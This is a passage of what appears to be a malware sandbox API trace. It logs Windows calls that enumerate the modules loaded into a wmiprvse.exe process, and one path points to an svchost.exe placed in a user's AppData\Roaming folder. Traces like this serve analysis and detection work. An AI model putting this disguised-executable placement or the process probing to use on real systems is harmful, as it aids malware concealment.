(cb=0x804) returned 0xd910e0 [0071.681] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0071.681] CoTaskMemFree (pv=0xd910e0) [0071.681] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x2549218, cb=0x18 | out: lpmodinfo=0x2549218*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0071.681] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.681] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0071.682] CoTaskMemFree (pv=0xd910e0) [0071.682] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.682] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0071.682] CoTaskMemFree (pv=0xd910e0) [0071.682] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x254b3d8, cb=0x18 | out: lpmodinfo=0x254b3d8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0071.683] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.683] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0071.683] CoTaskMemFree (pv=0xd910e0) [0071.683] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.683] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0071.684] CoTaskMemFree (pv=0xd910e0) [0071.684] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x254d5a8, cb=0x18 | out: lpmodinfo=0x254d5a8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0071.685] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.685] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0071.685] CoTaskMemFree (pv=0xd910e0) [0071.685] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.685] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0071.686] CoTaskMemFree (pv=0xd910e0) [0071.686] CloseHandle (hObject=0x214) returned 1 [0071.686] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0071.686] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc1c) returned 0x214 [0071.687] EnumProcessModules (in: hProcess=0x214, lphModule=0x254fcc8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x254fcc8, lpcbNeeded=0x23ee40) returned 1 [0071.690] GetModuleInformation (in: hProcess=0x214, hModule=0x13f7d0000, lpmodinfo=0x254ff38, cb=0x18 | out: lpmodinfo=0x254ff38*(lpBaseOfDll=0x13f7d0000, SizeOfImage=0x6c000, EntryPoint=0x13f80b450)) returned 1 [0071.691] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.691] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x13f7d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wmiprvse.exe") returned 0xc [0071.691] CoTaskMemFree (pv=0xd910e0) [0071.691] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.691] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x13f7d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wmiprvse.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")) returned 0x25 [0071.692] CoTaskMemFree (pv=0xd910e0) [0071.692] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2552148, cb=0x18 | out: lpmodinfo=0x2552148*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0071.692] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.692] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0071.692] CoTaskMemFree (pv=0xd910e0) [0071.692] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.692] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0071.693] CoTaskMemFree (pv=0xd910e0) [0071.693] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x2554308, cb=0x18 | out: lpmodinfo=0x2554308*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0071.693] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.693] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0071.694] CoTaskMemFree (pv=0xd910e0) [0071.694] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.694] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0071.694] CoTaskMemFree (pv=0xd910e0) [0071.694] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x25564d8, cb=0x18 | out: lpmodinfo=0x25564d8*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0071.695] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.695] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0071.695] CoTaskMemFree (pv=0xd910e0) [0071.695] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.695] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0071.696] CoTaskMemFree (pv=0xd910e0) [0071.696] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x25586a8, cb=0x18 | out: lpmodinfo=0x25586a8*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0071.696] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.696] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0071.697] CoTaskMemFree (pv=0xd910e0) [0071.697] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.697] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0071.698] CoTaskMemFree (pv=0xd910e0) [0071.698] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x255a8c0, cb=0x18 | out: lpmodinfo=0x255a8c0*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0071.698] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.698] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0071.699] CoTaskMemFree (pv=0xd910e0) [0071.699] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.699] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0071.699] CoTaskMemFree (pv=0xd910e0) [0071.700] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x255ca80, cb=0x18 | out: lpmodinfo=0x255ca80*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0071.700] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.700] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0071.701] CoTaskMemFree (pv=0xd910e0) [0071.701] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.701] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0071.702] CoTaskMemFree (pv=0xd910e0) [0071.702] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x255ec30, cb=0x18 | out: lpmodinfo=0x255ec30*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0071.702] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.702] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0071.703] CoTaskMemFree (pv=0xd910e0) [0071.703] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.703] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0071.704] CoTaskMemFree (pv=0xd910e0) [0071.704] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x2560df0, cb=0x18 | out: lpmodinfo=0x2560df0*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0071.705] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.705] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0071.705] CoTaskMemFree (pv=0xd910e0) [0071.705] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.706] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0071.706] CoTaskMemFree (pv=0xd910e0) [0071.706] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdf90000, lpmodinfo=0x2563048, cb=0x18 | out: lpmodinfo=0x2563048*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0071.707] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.707] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdf90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0071.708] CoTaskMemFree (pv=0xd910e0) [0071.708] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.708] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdf90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0071.709] CoTaskMemFree (pv=0xd910e0) [0071.709] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff760000, lpmodinfo=0x2565230, cb=0x18 | out: lpmodinfo=0x2565230*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0071.710] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.710] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0071.711] CoTaskMemFree (pv=0xd910e0) [0071.711] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.711] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0071.712] CoTaskMemFree (pv=0xd910e0) [0071.712] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x25673f0, cb=0x18 | out: lpmodinfo=0x25673f0*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0071.713] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.713] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0071.714] CoTaskMemFree (pv=0xd910e0) [0071.714] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.714] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0071.715] CoTaskMemFree (pv=0xd910e0) [0071.715] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x25695b0, cb=0x18 | out: lpmodinfo=0x25695b0*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0071.716] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.716] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0071.717] CoTaskMemFree (pv=0xd910e0) [0071.717] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.717] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0071.718] CoTaskMemFree (pv=0xd910e0) [0071.718] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x256b780, cb=0x18 | out: lpmodinfo=0x256b780*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0071.719] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.719] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0071.720] CoTaskMemFree (pv=0xd910e0) [0071.720] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.720] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0071.721] CoTaskMemFree (pv=0xd910e0) [0071.721] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9bc0000, lpmodinfo=0x256d940, cb=0x18 | out: lpmodinfo=0x256d940*(lpBaseOfDll=0x7fef9bc0000, SizeOfImage=0xd3000, EntryPoint=0x7fef9c38b00)) returned 1 [0071.722] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.722] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9bc0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="FastProx.dll") returned 0xc [0071.724] CoTaskMemFree (pv=0xd910e0) [0071.724] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.724] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9bc0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\FastProx.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")) returned 0x25 [0071.725] CoTaskMemFree (pv=0xd910e0) [0071.725] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9e20000, lpmodinfo=0x256fb18, cb=0x18 | out: lpmodinfo=0x256fb18*(lpBaseOfDll=0x7fef9e20000, SizeOfImage=0x77000, EntryPoint=0x7fef9e5e7f0)) returned 1 [0071.726] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.726] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9e20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wbemcomn2.DLL") returned 0xd [0071.727] CoTaskMemFree (pv=0xd910e0) [0071.728] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.728] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9e20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbemcomn2.DLL" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")) returned 0x21 [0071.729] CoTaskMemFree (pv=0xd910e0) [0071.729] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd1e0000, lpmodinfo=0x2571ce8, cb=0x18 | out: lpmodinfo=0x2571ce8*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0071.730] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.730] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd1e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0071.732] CoTaskMemFree (pv=0xd910e0) [0071.733] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.733] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd1e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0071.734] CoTaskMemFree (pv=0xd910e0) [0071.734] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff970000, lpmodinfo=0x2573fc0, cb=0x18 | out: lpmodinfo=0x2573fc0*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0071.735] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.735] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff970000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0071.737] CoTaskMemFree (pv=0xd910e0) [0071.737] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.737] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff970000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0071.738] CoTaskMemFree (pv=0xd910e0) [0071.738] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9c0000, lpmodinfo=0x2576180, cb=0x18 | out: lpmodinfo=0x2576180*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0071.739] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.740] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0071.741] CoTaskMemFree (pv=0xd910e0) [0071.741] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.741] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0071.742] CoTaskMemFree (pv=0xd910e0) [0071.742] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9b90000, lpmodinfo=0x2578330, cb=0x18 | out: lpmodinfo=0x2578330*(lpBaseOfDll=0x7fef9b90000, SizeOfImage=0x27000, EntryPoint=0x7fef9b911a0)) returned 1 [0071.744] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0071.744] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9b90000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NTDSAPI.dll") returned 0xb [0071.745] CoTaskMemFree (pv=0xd910e0) [0071.745] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9b90000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NTDSAPI.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")) returned 0x1f [0071.747] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef95c0000, lpmodinfo=0x257a4f0, cb=0x18 | out: lpmodinfo=0x257a4f0*(lpBaseOfDll=0x7fef95c0000, SizeOfImage=0x12000, EntryPoint=0x7fef95c89d0)) returned 1 [0071.748] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef95c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="NCObjAPI.DLL") returned 0xc [0071.750] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef95c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NCObjAPI.DLL" (normalized: "c:\\windows\\system32\\ncobjapi.dll")) returned 0x20 [0071.751] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x257c6c0, cb=0x18 | out: lpmodinfo=0x257c6c0*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0071.753] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0071.755] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0071.756] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x257e880, cb=0x18 | out: lpmodinfo=0x257e880*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0071.758] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0071.759] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0071.761] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x2580a40, cb=0x18 | out: lpmodinfo=0x2580a40*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0071.763] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0071.765] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0071.766] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb800000, lpmodinfo=0x2582c10, cb=0x18 | out: lpmodinfo=0x2582c10*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0071.768] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb800000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0071.770] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb800000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0071.771] GetModuleInformation (in: hProcess=0x214, hModule=0x7feffae0000, lpmodinfo=0x2584dd0, cb=0x18 | out: lpmodinfo=0x2584dd0*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0071.773] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feffae0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0071.775] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feffae0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0071.777] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff360000, lpmodinfo=0x2586f90, cb=0x18 | out: lpmodinfo=0x2586f90*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0071.779] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff360000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0071.781] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff360000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0071.783] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9b80000, lpmodinfo=0x2589168, cb=0x18 | out: lpmodinfo=0x2589168*(lpBaseOfDll=0x7fef9b80000, SizeOfImage=0xe000, EntryPoint=0x7fef9b85500)) returned 1 [0071.784] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9b80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wbemprox.dll") returned 0xc [0071.786] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9b80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")) returned 0x25 [0071.788] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd070000, lpmodinfo=0x258b340, cb=0x18 | out: lpmodinfo=0x258b340*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0071.790] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd070000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0071.792] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd070000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0071.797] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcd70000, lpmodinfo=0x258d500, cb=0x18 | out: lpmodinfo=0x258d500*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0071.799] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcd70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0071.801] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcd70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0071.803] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x258f6c0, cb=0x18 | out: 